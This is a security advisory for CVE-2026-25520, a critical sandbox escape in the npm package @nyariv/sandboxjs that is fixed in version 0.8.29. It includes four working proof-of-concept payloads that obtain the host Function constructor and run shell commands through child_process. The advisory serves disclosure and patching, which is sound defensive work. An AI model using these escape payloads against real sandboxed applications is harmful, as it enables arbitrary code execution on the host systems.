GHSA-58jh-xv4v-pcx4

Source

https://github.com/advisories/GHSA-58jh-xv4v-pcx4

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-58jh-xv4v-pcx4/GHSA-58jh-xv4v-pcx4.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-58jh-xv4v-pcx4

Aliases

CVE-2026-25520

Published

2026-02-05T20:41:28Z

Modified

2026-02-06T22:22:10.705894Z

Severity

10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator

Summary

@nyariv/sandboxjs has a Sandbox Escape issue

Details

Summary

The return values of functions aren't wrapped. Object.values/Object.entries can be used to get an Array containing the host's Function constructor, by using Array.prototype.at you can obtain the hosts Function constructor, which can be used to execute arbitrary code outside of the sandbox.

Details

The return values of functions aren't wrapped, chaining function calls allows bypassing most validation/sanitization.

PoC

const s = require('@nyariv/sandboxjs').default;
const sb = new s();

payload = `
console.log(
  Object.values(this).at(0)(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);
`

sb.compile(payload)().run();

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
console.log(
  Object.entries(this)[0].at(1)(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);
`

sb.compile(payload)().run();

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
console.log(
  Object.entries(this)
    .at(0)
    .map((f) => {
      if (typeof f === 'function') {
        f.call('', 'return process')()
          .getBuiltinModule('child_process')
          .execSync('ls -lah', { stdio: 'inherit' });
      }
    }),
);
`

sb.compile(payload)().run();

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
const t = (f) => {
  f.call('', 'return process')()
    .getBuiltinModule('child_process')
    .execSync('ls -lah', { stdio: 'inherit' });
};
console.log(t.call(...Object.entries(this)[0]));
`

sb.compile(payload)().run();

Impact

Sanbox Escape -> RCE

Database specific

{
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-05T20:41:28Z",
    "cwe_ids": [
        "CWE-74"
    ],
    "severity": "CRITICAL",
    "nvd_published_at": "2026-02-06T20:16:10Z"
}

References

Affected packages

npm / @nyariv/sandboxjs

Package

Name: @nyariv/sandboxjs; View open source insights on deps.dev
Purl: pkg:npm/%40nyariv/sandboxjs

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.8.29

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-58jh-xv4v-pcx4/GHSA-58jh-xv4v-pcx4.json"

last_known_affected_version_range

"<= 0.8.28"